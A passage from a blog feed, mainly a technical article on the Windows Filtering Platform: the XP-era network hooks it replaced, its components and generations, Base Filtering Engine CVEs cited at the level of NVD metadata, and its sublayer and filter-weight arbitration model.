  { term: &quot;BCD recoverysequence&quot;, definition: &quot;The BCD element on a Windows Boot Loader entry that points at a separate BCD entry containing the WinRE configuration; the mechanism by which the boot manager routes a recovery trigger into WinRE.&quot; },
  { term: &quot;Quick Machine Recovery (QMR)&quot;, definition: &quot;The Windows 11 24H2 feature that lets WinRE acquire network connectivity, query Windows Update for a targeted remediation, apply it, and reboot.&quot; },
  { term: &quot;Windows Resiliency Initiative (WRI)&quot;, definition: &quot;Microsoft&apos;s post-CrowdStrike program for treating recovery as part of the security architecture; comprises QMR, MVI 3.0, the user-mode AV platform, Intune WinRE-state surfacing, Point-in-Time Restore, and Cloud Rebuild.&quot; },
  { term: &quot;MVI 3.0&quot;, definition: &quot;Version 3.0 of the Microsoft Virus Initiative, effective April 1, 2025; requires Trusted Signing, Safe Deployment Practices, NDA, and 12-month independent test-lab certification as preconditions for Windows AV driver signing rights.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>security</category><category>recovery</category><category>winre</category><category>resilience</category><category>crowdstrike</category><category>bitlocker</category><category>system-internals</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Windows Filtering Platform: The Kernel-Mode Firewall You Don&apos;t See</title><link>https://paragmali.com/blog/windows-filtering-platform-the-kernel-mode-firewall-you-dont/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-filtering-platform-the-kernel-mode-firewall-you-dont/</guid><description>The Windows Filtering Platform is the kernel-mode engine under wf.msc, IPsec, WinNAT, the Hyper-V vSwitch, and every modern Windows EDR.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Open &lt;code&gt;wf.msc&lt;/code&gt;. Right-click &quot;Inbound Rules,&quot; click &quot;New Rule,&quot; fill in the form, click OK. You think you just configured a firewall. What you actually did was register one filter, inside one sublayer, at one of roughly sixty filtering layers in the kernel-mode classification path of a platform you have never named. The same platform is also running IPsec, container networking, Microsoft Defender for Endpoint&apos;s network protection, and every third-party EDR&apos;s network-telemetry pipeline on the Windows host you are using right now.&lt;/p&gt;

The Windows Filtering Platform (WFP) is the kernel- and user-mode service Microsoft shipped with Windows Vista in November 2006 to replace four mutually-incompatible XP-era hooks: NDIS intermediate drivers, the filter-hook IOCTL on `\Device\Ipfilterdriver`, Winsock Layered Service Providers, and TDI filter drivers. It is the substrate beneath Windows Defender Firewall, Windows IPsec, WinNAT, the Hyper-V Extensible Switch, Defender for Endpoint Network Protection, and every third-party EDR&apos;s network telemetry. WFP is not a firewall. It is the platform that a firewall is one consumer of. It arbitrates competing security products deterministically through 64-bit filter weights inside priority-ordered sublayers, and that arbitration model is the load-bearing reason third-party callouts can finally coexist on the same host. The same kernel-extensibility tax that doomed the pre-WFP hooks now resurfaces as a steady drip of Base Filtering Engine elevation-of-privilege CVEs (CVE-2023-29368, CVE-2024-38034) -- the running cost of a platform sophisticated enough to host every downstream network-security feature Windows ships.
&lt;h2&gt;1. You Just Clicked OK on Sixty Filtering Layers&lt;/h2&gt;
&lt;p&gt;The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature is a configuration of the same engine.&lt;/p&gt;
&lt;p&gt;That is the central claim of this article, and it is the kind of statement that sounds like marketing until you trace the actual wires. Trace them once and you stop seeing &quot;Windows Defender Firewall&quot; and &quot;IPsec&quot; and &quot;Windows containers&quot; as separate products. They are all clients of the same kernel/user-mode service, configuring the same filter engine, arbitrated by the same Base Filtering Engine, classified across the same approximately sixty &lt;code&gt;FWPM_LAYER_*&lt;/code&gt; identifiers [@wfp-layers].&lt;/p&gt;

Microsoft&apos;s cross-mode network-traffic filtering service introduced in Windows Vista and Windows Server 2008. WFP &quot;is designed to replace previous packet filtering technologies such as Transport Driver Interface (TDI) filters, Network Driver Interface Specification (NDIS) filters, and Winsock Layered Service Providers (LSP)&quot; [@wfp-start]. The platform has five components: the Filter Engine, the Base Filtering Engine, a set of kernel-mode shims, callout drivers, and the management API [@wfp-about].

A Windows service named `bfe` that, in Microsoft&apos;s own words, &quot;controls the operation of the Windows Filtering Platform&quot; and &quot;plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine&quot; [@wfp-about]. The BFE is not the Windows Firewall. The Windows Firewall is a separate service (`MpsSvc`) that talks to the BFE.
&lt;p&gt;The naming is the first thing that trips readers. There is a service called BFE and a service called MpsSvc. They live in different rows of &lt;code&gt;Get-Service&lt;/code&gt; output. They have different binary backings. The dependency arrow runs one way: MpsSvc requires BFE, never the other direction. That asymmetry, which seems pedantic, turns out to be load-bearing for the rest of the story. WFP is the platform. The firewall is a tenant.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature -- Windows Defender Firewall with Advanced Security, Windows IPsec, WinNAT and container networking, the Hyper-V Extensible Switch, Microsoft Defender for Endpoint Network Protection, every third-party EDR with a network filter -- is a configuration of the same engine [@forshaw-2021].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If WFP is the engine, what was there before it? Why did Microsoft need to build a platform when Windows XP SP2 had already shipped a firewall?&lt;/p&gt;
&lt;h2&gt;2. Before WFP -- An Internet on Fire&lt;/h2&gt;
&lt;p&gt;April 2004. Sasser is propagating through the LSASS RPC interface on port 445, infecting unpatched Windows machines within minutes of their first cable plug. Microsoft has just shipped Windows XP SP2, with the Internet Connection Firewall rebranded as &quot;Windows Firewall&quot; and turned on by default for the first time [@wiki-winfw].Wikipedia notes that &quot;the ongoing prevalence of these worms through 2004 resulted in unpatched machines being infected within a matter of minutes,&quot; and that Microsoft &quot;switched it on by default since Windows XP SP2.&quot; XP SP2 reached general availability on August 25, 2004 [@wiki-winfw]. That fixed the worm problem. It did not fix the plumbing problem.&lt;/p&gt;
&lt;p&gt;The plumbing problem was that third-party security vendors were already hooking the Windows network stack at four different, mutually incompatible places, none of which arbitrated with the others. ZoneAlarm, Norton Internet Security, McAfee, Kerio, Check Point, BlackICE, and a dozen others were shipping kernel drivers that bolted onto Windows wherever they could find a callable surface [@wiki-winfw][@forshaw-2021]. They picked four families.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Network Driver Interface Specification (NDIS) intermediate drivers.&lt;/strong&gt; NDIS 5.x exposed a profile called the intermediate driver that sat below the protocol stack and above the miniport. A vendor could install a driver that saw every Ethernet frame on the way up and every IP packet on the way down. The price was complexity: NDIS intermediate drivers had to participate in the entire NDIS binding state machine, and Microsoft&apos;s own documentation later admitted that the model was painful enough that the platform team replaced it with the much simpler NDIS Lightweight Filter (LWF) in NDIS 6.0 [@ndis-filter].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Filter-hook drivers on &lt;code&gt;\Device\Ipfilterdriver&lt;/code&gt;.&lt;/strong&gt; The IP filter driver exposed a single IOCTL, &lt;code&gt;IOCTL_PF_SET_EXTENSION_POINTER&lt;/code&gt;, that registered a single callback function the kernel would invoke on every received or transmitted IP packet [@ipfilter-legacy]. There was one callback pointer per machine. IPv4 only. Network layer only. No documented contract for what happened when a second vendor registered.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Winsock Layered Service Providers (LSPs).&lt;/strong&gt; A user-mode shim chained into every Winsock application, in process. LSPs had access to per-application context, but their cost was paid in blast radius: Microsoft&apos;s own categorisation guide warned that &quot;certain system critical processes such as winlogon and lsass create sockets&quot; and that &quot;a number of cases have also been documented where buggy LSPs can cause &lt;code&gt;lsass.exe&lt;/code&gt; to crash. If lsass crashes, the system forces a shutdown&quot; [@lsp-categories].&lt;/p&gt;

A user-mode DLL that chains into the Winsock service-provider stack of every process that opens a socket. LSPs were the Windows mechanism for content inspection and per-application network rules before Vista. They are still installable, but Microsoft&apos;s documentation now categorises which processes must not load them because of the lsass-crash failure mode [@lsp-categories].
&lt;p&gt;&lt;strong&gt;TDI filter drivers.&lt;/strong&gt; The Transport Driver Interface, the legacy kernel interface above TCP/IP, supported a filter-driver pattern that preserved application identity and could veto connections at the transport. It was the cleanest of the four options. It also stopped being a viable target the moment Microsoft deprecated TDI in Vista: &quot;The TDI feature is deprecated and will be removed in future versions of Microsoft Windows. Depending on how you use TDI, use either the Winsock Kernel (WSK) or Windows Filtering Platform (WFP)&quot; [@tdi-legacy].&lt;/p&gt;
&lt;p&gt;Four hooks, four failure modes, no arbitration between any of them. In May 2006 Madhurima Pawar and Eric Stenson of Windows Networking walked the WinHEC audience through one number that captured the consequence: firewall and antivirus conflicts accounted for 12 percent of all Windows operating-system crashes [@pawar-stenson-winhec].&lt;/p&gt;

Reduces firewall and anti-virus crashes -- 12% of all OS crashes. -- Madhurima Pawar and Eric Stenson, WinHEC 2006 [@pawar-stenson-winhec]
&lt;p&gt;That is the design motivation for WFP in twelve words. The XP-era hook zoo was not a security architecture; it was a steady source of bluescreens. Microsoft&apos;s documentation reads, looking back at the era from Vista: &quot;Starting in Windows Server 2008 and Windows Vista, the firewall hook and the filter hook drivers are not available; applications that were using these drivers should use WFP instead&quot; [@wfp-start]. As Forshaw later summarised it, &quot;these firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone&quot; [@forshaw-2021].&lt;/p&gt;

flowchart TD
    NIC[Physical NIC] --&amp;gt; MINI[NDIS miniport driver]
    MINI --&amp;gt; IM[&quot;NDIS 5.x intermediate driver&lt;br /&gt;(hook #1: NDIS-IM)&quot;]
    IM --&amp;gt; TCPIP[TCPIP.SYS]
    TCPIP -.-&amp;gt; IPF[&quot;\Device\Ipfilterdriver&lt;br /&gt;(hook #2: filter-hook IOCTL)&quot;]
    TCPIP --&amp;gt; TDI[&quot;TDI transport providers&quot;]
    TDI --&amp;gt; TDIF[&quot;TDI filter driver&lt;br /&gt;(hook #3: TDI filter)&quot;]
    TDIF --&amp;gt; AFD[AFD.SYS]
    AFD --&amp;gt; WS2[ws2_32.dll Winsock]
    WS2 --&amp;gt; LSP[&quot;Winsock LSP chain&lt;br /&gt;(hook #4: in-process LSP)&quot;]
    LSP --&amp;gt; APP[Application]
&lt;p&gt;So why didn&apos;t Microsoft just fix the hooks? Why a whole new platform?&lt;/p&gt;
&lt;h2&gt;3. Why Four Hooks Could Not Be Saved&lt;/h2&gt;
&lt;p&gt;Picture a Windows XP machine in 2005, four months past SP2. The user, doing what users do, installs two antivirus suites: one from a free trial that came with the laptop, one from work. Each ships a kernel driver. Each one calls &lt;code&gt;IOCTL_PF_SET_EXTENSION_POINTER&lt;/code&gt; on &lt;code&gt;\Device\Ipfilterdriver&lt;/code&gt; to register a packet-inspection callback [@ipfilter-legacy]. An hour later the machine bluescreens during a Windows Update download.&lt;/p&gt;
&lt;p&gt;The Microsoft documentation for the IOCTL is precise about what the call does (&quot;registers filter-hook callback functions to the IP filter driver to inform the IP filter driver to call those filter hook callbacks for every IP packet that is received or transmitted&quot;) and silent about what happens if a second driver makes the same call before the first one unregisters [@ipfilter-legacy]. The page does not document chaining semantics. There is no mention of a registration list, a callback array, a refcount, or a priority. The driver writers got to invent that themselves, separately, in shipped products. The crash reports speak for the result.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Learn documents the filter-hook registration mechanism on &lt;code&gt;\Device\Ipfilterdriver&lt;/code&gt; exactly once, in the legacy reference for &lt;code&gt;IOCTL_PF_SET_EXTENSION_POINTER&lt;/code&gt; [@ipfilter-legacy]. The page tells you how to register a callback. It does not tell you what happens when two callers register concurrently. That gap is the architectural bug. The 12-percent-of-OS-crashes number from WinHEC 2006 is the bill [@pawar-stenson-winhec].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each of the four pre-WFP hooks had a specific architectural flaw. Together those flaws define what WFP had to be.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Filter-hook (IpFilterDriver).&lt;/strong&gt; One callback pointer per machine; no arbitration; IPv4 only; network layer only. Two security products fight over one callback, and there is no documented way to chain them. Failure: arbitration impossible, vendor coexistence accidental.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NDIS 5.x intermediate driver.&lt;/strong&gt; High complexity, no application identity (it sees frames, not processes), install-order-dependent binding chains. Microsoft&apos;s own assessment of the model, written for the LWF replacement that came in 2006, is: &quot;Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers&quot; [@ndis-filter]. Failure: too low for app-aware policy, too painful to write.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TDI filter.&lt;/strong&gt; Preserved application identity. Vetoed connections at the transport boundary. Architecturally the cleanest of the four. Then Microsoft deprecated TDI in Vista [@tdi-legacy] and the substrate evaporated. Failure: the floor disappeared.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Winsock LSP.&lt;/strong&gt; In-process. User mode. Bypassable by any program that called &lt;code&gt;Nt*&lt;/code&gt; system services directly. And, as the Microsoft categorisation page documents, a buggy LSP that crashes LSASS will take down the entire machine [@lsp-categories]. Failure: in process, bypassable, lethal when buggy.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pre-WFP hook&lt;/th&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;App identity&lt;/th&gt;
&lt;th&gt;Multi-vendor&lt;/th&gt;
&lt;th&gt;Failure mode&lt;/th&gt;
&lt;th&gt;Successor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Filter-hook (&lt;code&gt;IpFilterDriver&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Network (L3)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No documented contract for chaining&lt;/td&gt;
&lt;td&gt;Arbitration impossible [@ipfilter-legacy]&lt;/td&gt;
&lt;td&gt;WFP filter at &lt;code&gt;INBOUND_IPPACKET_*&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NDIS 5.x intermediate&lt;/td&gt;
&lt;td&gt;Data link (L2)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Install-order dependent&lt;/td&gt;
&lt;td&gt;Too low for app-aware rules; complex [@ndis-filter]&lt;/td&gt;
&lt;td&gt;NDIS Lightweight Filter (LWF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TDI filter&lt;/td&gt;
&lt;td&gt;Transport (L4)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (chainable)&lt;/td&gt;
&lt;td&gt;Substrate deprecated in Vista [@tdi-legacy]&lt;/td&gt;
&lt;td&gt;WFP ALE + Winsock Kernel (WSK)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Winsock LSP&lt;/td&gt;
&lt;td&gt;Above sockets (user mode)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Chainable in-process&lt;/td&gt;
&lt;td&gt;In-process bypass; lsass blast radius [@lsp-categories]&lt;/td&gt;
&lt;td&gt;WFP ALE; LSP retained for non-security uses&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Walk those failure modes column by column and a design constraint set falls out. Whatever Microsoft was going to build had to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Arbitrate multiple vendors deterministically. No more &quot;first IOCTL wins.&quot;&lt;/li&gt;
&lt;li&gt;Carry application identity through to the inspection point.&lt;/li&gt;
&lt;li&gt;Concentrate inspection at one platform, not four.&lt;/li&gt;
&lt;li&gt;Run out of process where possible. A buggy callout cannot be allowed to take down LSASS.&lt;/li&gt;
&lt;li&gt;Resolve conflicts predictably, with rules a third-party developer can read and design against.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant A as Vendor A installer
    participant B as Vendor B installer
    participant K as \Device\Ipfilterdriver
    participant P as IP packet path
    A-&amp;gt;&amp;gt;K: IOCTL_PF_SET_EXTENSION_POINTER(callback_A)
    Note over K: callback = callback_A
    B-&amp;gt;&amp;gt;K: IOCTL_PF_SET_EXTENSION_POINTER(callback_B)
    Note over K: callback = callback_B (no chaining contract)
    P-&amp;gt;&amp;gt;K: packet arrives
    K-&amp;gt;&amp;gt;B: callback_B(packet)
    Note over A: callback_A no longer invoked, vendor A stops working
    A-&amp;gt;&amp;gt;K: re-register callback_A
    Note over K: race: pointer flips again
    K--xP: inconsistent state, BSOD
&lt;p&gt;Vista shipped November 2006. What did the architects build to satisfy all five constraints at once?&lt;/p&gt;
&lt;h2&gt;4. The Evolution -- Five Generations of WFP&lt;/h2&gt;
&lt;p&gt;May 23-25, 2006, Seattle. Madhurima Pawar, Program Manager in Windows Networking, and Eric Stenson, Development Lead in Windows Networking, stand in front of a hostile room of third-party firewall ISVs at WinHEC and present &quot;Windows Filtering Platform And Winsock Kernel: Next-Generation Kernel Networking APIs.&quot; Slide 6 carries the design motivation that this article opened on: 12 percent of all OS crashes are firewall and AV conflicts. Slide 7 carries the architecture diagram [@pawar-stenson-winhec]. Six months later Vista shipped, with the filter-hook and firewall-hook drivers gone from the system and a new platform in their place [@wfp-start].Windows Vista was released to manufacturing on November 8, 2006, and made generally available to consumers on January 30, 2007 [@wiki-vista].&lt;/p&gt;
&lt;h3&gt;Generation 1: WFP v1 in Vista and Server 2008&lt;/h3&gt;
&lt;p&gt;WFP v1 introduced five named components. They are still the components the platform ships today. Microsoft&apos;s own &quot;About Windows Filtering Platform&quot; page enumerates them: the Filter Engine (&quot;the core multi-layer filtering infrastructure, hosted in both kernel-mode and user-mode&quot;); the Base Filtering Engine (&quot;a service that controls the operation of the Windows Filtering Platform&quot;); shims (&quot;kernel-mode components that reside between the kernel-mode network stack and the filter engine&quot;); callout drivers; and the management API [@wfp-about].&lt;/p&gt;

The core of WFP. Microsoft&apos;s WDK reference defines it as &quot;a component of the Windows Filtering Platform that stores filters and performs filter arbitration. Filters are added to the filter engine at designated filtering layers so that the filter engine can perform the desired filtering action (permit, drop, or a callout). If a filter in the filter engine specifies a callout for the filter&apos;s action, the filter engine calls the callout&apos;s classifyFn function&quot; [@wfp-filter-engine]. The engine is hosted in both kernel mode and user mode; its kernel classification path runs primarily inside `NETIO.SYS` [@forshaw-2021].

A kernel-mode bridge between a specific network stack module and the WFP filter engine. Vista shipped six shims: the Application Layer Enforcement (ALE) shim, the Transport Layer Module shim, the Network Layer Module shim, the ICMP Error shim, the Discard shim, and the Stream shim [@wfp-about]. Each shim invokes the filter engine at one or more `FWPM_LAYER_*` identifiers when traffic crosses it.
&lt;p&gt;The most consequential of those six shims is ALE.&lt;/p&gt;

&quot;A set of Windows Filtering Platform (WFP) kernel-mode layers that are used for stateful filtering&quot; [@wfp-ale]. ALE keeps per-connection state across packets, and -- this is the line that separates ALE from the rest of the platform -- &quot;ALE layers are the only WFP layers where network traffic can be filtered based on the application identity -- using a normalized file name -- and based on the user identity -- using a security descriptor&quot; [@wfp-ale]. ALE is why per-application firewall rules became possible in 2006. It is also the layer that classifies AppContainer connections in modern Windows.
&lt;p&gt;ALE pays for stateful filtering with bandwidth, not latency. The Microsoft Learn page makes the performance claim explicit: at ALE layers, the platform &quot;minimally impacts network performance by processing only the first packet in a connection&quot; [@wfp-about]. Subsequent packets ride the existing flow state. That choice is what lets a per-process firewall rule scale to gigabit network rates.&lt;/p&gt;

April 12, 2010. Microsoft ships a Windows Filtering Platform driver hotfix rollup, KB981889, that bundles three previously-separate fixes into one package. The Microsoft Support page enumerates them verbatim [@kb981889]:&lt;p&gt;&lt;em&gt;KB976759 -- &quot;WFP drivers may cause a failure to disconnect the RDP connection to a multiprocessor computer.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;KB979278 -- &quot;Using two Windows Filtering Platform (WFP) drivers causes a computer to crash.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;KB979223 -- &quot;A nonpaged pool memory leak occurs when you use a WFP callout driver.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Read KB979278 again. &lt;em&gt;Two WFP drivers cause a crash.&lt;/em&gt; The XP-era &quot;two AV vendors fight&quot; bug had survived into the new platform, in a different shape: the WFP arbitration model held -- the conflict between filters was deterministic -- but the &lt;em&gt;callout driver lifecycle&lt;/em&gt; had not yet been hardened. That distinction is the structural seed of the BFE elevation-of-privilege CVE class fifteen years later. Section 8 returns to it.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Generation 2: WFP v2 in Windows 8 and Server 2012&lt;/h3&gt;
&lt;p&gt;Windows 8 and Server 2012 shipped a refresh in 2012. The &quot;What&apos;s New in Windows Filtering Platform&quot; page enumerates the delta in four bullets [@wfp-whatsnew]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Layer 2 filtering: Provides access to the L2 (MAC) layer, allowing filtering of traffic at that layer. vSwitch filtering: Allows packets traversing a vSwitch to be inspected and/or modified. WFP filters or callouts can be used at the vSwitch ingress and egress. App container management: Allows access to information about app containers and network isolation connectivity issues. IPsec updates: Extended IPsec functionality including connection state monitoring, certificate selection, and key management.&quot; [@wfp-whatsnew]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four features, but the second one -- vSwitch filtering -- is the architecturally significant one. With Windows 8, WFP slid under the Hyper-V Extensible Switch. From that release forward, every Hyper-V VM&apos;s packet path is a WFP-extensible classification problem, and the same kernel-mode platform that filters host traffic also filters tenant traffic [@wfp-whatsnew].&lt;/p&gt;
&lt;h3&gt;Generation 3: Windows 10 ALE redirection (2015-2021)&lt;/h3&gt;
&lt;p&gt;The Windows 10 family added two ALE layers that did not exist in Vista: &lt;code&gt;CONNECT_REDIRECT&lt;/code&gt; and &lt;code&gt;BIND_REDIRECT&lt;/code&gt;. The &quot;ALE Layers&quot; page lists them at the bottom of its enumeration [@wfp-ale-layers]. Their job is exactly what their names say -- redirect an outbound connection (proxy it through a different address), or redirect a bind (force a process to bind to a different local endpoint). Web proxies, transparent forwarders, and AppContainer policy now had a kernel-side hook that did not exist before. Forshaw&apos;s 2021 Project Zero post documents how the modern Windows Defender Firewall pipeline runs through these layers end-to-end: &quot;MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel... The evaluation is handled primarily by the NETIO driver as well as registered callout drivers&quot; [@forshaw-2021].&lt;/p&gt;
&lt;h3&gt;Generation 4: URO and the CVE drumbeat (2022-2024)&lt;/h3&gt;
&lt;p&gt;The most recent generation comes in two parallel tracks. The first is a hardware offload feature. NDIS 6.89, the version of the NDIS driver interface that &quot;is included in Windows 11, version 24H2 and Windows Server 2022 and later,&quot; adds support for UDP Receive Segment Coalescing Offload, &quot;this hardware offload enables NICs to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet&quot; [@ndis-689]. Windows 11 24H2 reached general availability on October 1, 2024 [@wiki-win11-24h2].&lt;/p&gt;
&lt;p&gt;The second track is a sequence of elevation-of-privilege CVEs in the Base Filtering Engine. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free with a CVSS base of 7.0 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The 2024 vulnerability&apos;s attack-complexity sub-score dropped from &lt;code&gt;AC:H&lt;/code&gt; (high) in 2023 to &lt;code&gt;AC:L&lt;/code&gt; (low) in 2024. The exploitability sub-score rose from 1.0 to 1.8 over the same interval [@nvd-2023-29368][@nvd-2024-38034]. The trend line is that BFE EoP is getting easier to weaponise, not harder.&lt;/p&gt;

flowchart TD
    UM[&quot;User-mode application&lt;br /&gt;(e.g. wf.msc / netsh / MpsSvc)&quot;] --&amp;gt; API[&quot;Fwpm* management API&lt;br /&gt;(fwpuclnt.dll)&quot;]
    API --&amp;gt; BFE[&quot;Base Filtering Engine service&lt;br /&gt;(bfe, user mode)&quot;]
    BFE --&amp;gt; FE[&quot;Filter Engine&lt;br /&gt;(kernel + user mode)&quot;]
    FE --&amp;gt; KCLI[&quot;fwpkclnt.sys&lt;br /&gt;(kernel-mode WFP client / export driver)&quot;]
    FE --&amp;gt; NETIO[&quot;NETIO.SYS&lt;br /&gt;(classification path)&quot;]
    NETIO --&amp;gt; ALE[&quot;ALE shim&quot;]
    NETIO --&amp;gt; TLM[&quot;Transport-Layer shim&quot;]
    NETIO --&amp;gt; NLM[&quot;Network-Layer shim&quot;]
    NETIO --&amp;gt; STREAM[&quot;Stream shim&quot;]
    NETIO --&amp;gt; ICMP[&quot;ICMP-Error shim&quot;]
    NETIO --&amp;gt; DISC[&quot;Discard shim&quot;]
    ALE --&amp;gt; COUT[&quot;Callout drivers&lt;br /&gt;(IPsec, in-box stealth, EDR, 3rd-party)&quot;]
    TLM --&amp;gt; COUT
    NLM --&amp;gt; COUT
    STREAM --&amp;gt; COUT
    ICMP --&amp;gt; COUT
    DISC --&amp;gt; COUT

timeline
    title Five generations of the Windows Filtering Platform
    2006-11 : Windows Vista / Server 2008 -- WFP v1 (filter engine, BFE, six shims, callouts)
    2010-04 : KB981889 hotfix rollup -- three named WFP driver bugs, including two-WFP-drivers crash
    2012-09 : Windows 8 / Server 2012 -- WFP v2 (L2, vSwitch, AppContainer, IPsec extensions)
    2015-21 : Windows 10 -- ALE CONNECT_REDIRECT / BIND_REDIRECT, AppContainer-aware ALE
    2023-06 : CVE-2023-29368 published (CWE-415 double-free, CVSS 7.0)
    2024-07 : CVE-2024-38034 published (CWE-190 integer overflow, CVSS 7.8)
    2024-10 : Windows 11 24H2 -- NDIS 6.89 adds URO (UDP receive coalescing)
&lt;p&gt;Timeline sources, in row order: WinHEC 2006 and the Vista release on the Microsoft Learn WFP start page [@pawar-stenson-winhec][@wfp-start]; KB981889 [@kb981889]; the &quot;What&apos;s New&quot; page [@wfp-whatsnew]; ALE Layers [@wfp-ale-layers] and Forshaw 2021 [@forshaw-2021]; the NVD records for CVE-2023-29368 and CVE-2024-38034 [@nvd-2023-29368][@nvd-2024-38034]; NDIS 6.89 introduction and the Windows 11 24H2 GA date [@ndis-689][@wiki-win11-24h2].&lt;/p&gt;
&lt;p&gt;Five generations, one engine, no replacements. Why does the same engine still ship in 2026? What is the architectural insight that made it last?&lt;/p&gt;
&lt;h2&gt;5. Sublayers, Weights, and Veto -- The Arbitration Insight&lt;/h2&gt;
&lt;p&gt;Here is the question every Windows administrator has wondered: how do two competing security products coexist on the same machine without crashing each other? Before Vista the honest answer was, &quot;they didn&apos;t, mostly, and when they did it was an accident.&quot; After Vista the honest answer is, &quot;WFP arbitrates them deterministically.&quot; The mechanism is the load-bearing piece of the platform, and it is built out of two ideas.&lt;/p&gt;
&lt;h3&gt;Idea 1: Sublayers and weights&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s &quot;Filter Arbitration&quot; page describes the algorithm in two sentences that almost no Windows administrator has read:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Each filter layer is divided into sub-layers ordered by priority (also called weight). Network traffic traverses sub-layers from the highest priority to the lowest priority... Within each sub-layer, filters are ordered by weight. Network traffic is indicated to matching filters from highest weight to lowest weight.&quot; [@wfp-arbitration]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A layer (say, &lt;code&gt;FWPM_LAYER_ALE_AUTH_CONNECT_V4&lt;/code&gt;, the place where outbound IPv4 TCP connection authorization is decided) contains an ordered list of sublayers. Each sublayer contains an ordered list of filters. Sublayer priority orders the sublayers. Filter weight orders the filters within a sublayer. Network traffic walks the structure top-down, sublayer by sublayer, filter by filter, until a terminal action is reached.&lt;/p&gt;

A named, priority-ordered subdivision of a WFP filtering layer. Each sublayer owns a list of filters and has its own GUID. Microsoft&apos;s recommendation, in the filter-weight documentation, is that independent vendors &quot;create their own sublayer by using `FwpmSubLayerAdd0`&quot; rather than register filters into another vendor&apos;s sublayer [@wfp-weight]. Sublayer priority is what lets two vendors coexist without interfering.

A 64-bit value attached to a filter that orders evaluation within a sublayer. The &quot;Filter Weight Assignment&quot; page documents three legal assignment styles: &quot;Set the weight to an FWP_UINT64. BFE uses the supplied weight as is. Set the weight to FWP_EMPTY. BFE automatically generates a weight in the range [0, 2^60). Set the weight to an FWP_UINT8 in the range [0, 15]. BFE uses the supplied weight as a weight range identifier&quot; [@wfp-weight]. Sixteen high-order weight ranges, $[0, 2^{60})$ within each, give vendors a way to carve out non-overlapping neighbourhoods.
&lt;p&gt;The mathematical model is simpler than the prose suggests. Filter weight is an element of $[0, 2^{64})$. A filter at weight $w_1$ runs before a filter at weight $w_2$ inside the same sublayer if $w_1 &amp;gt; w_2$. Sublayer priority orders the sublayers themselves. When a vendor registers its sublayer at, say, priority 0x1000 and chooses filters in the weight range $[2^{60}, 2^{61})$, that vendor has a deterministic neighbourhood that no other vendor will trample, provided the other vendors follow Microsoft&apos;s recommendation to call &lt;code&gt;FwpmSubLayerAdd0&lt;/code&gt; and use their own sublayer.The 16-range partitioning via &lt;code&gt;FWP_UINT8&lt;/code&gt; weights is the mechanism that the platform team baked in to give vendors a coordination protocol without requiring vendors to talk to each other. Microsoft Learn&apos;s recommendation, verbatim: &quot;This issue can be prevented by having callouts create their own sublayer by using &lt;code&gt;FwpmSubLayerAdd0&lt;/code&gt;&quot; [@wfp-weight].&lt;/p&gt;
&lt;h3&gt;Idea 2: Block-overrides-Permit with Veto&lt;/h3&gt;
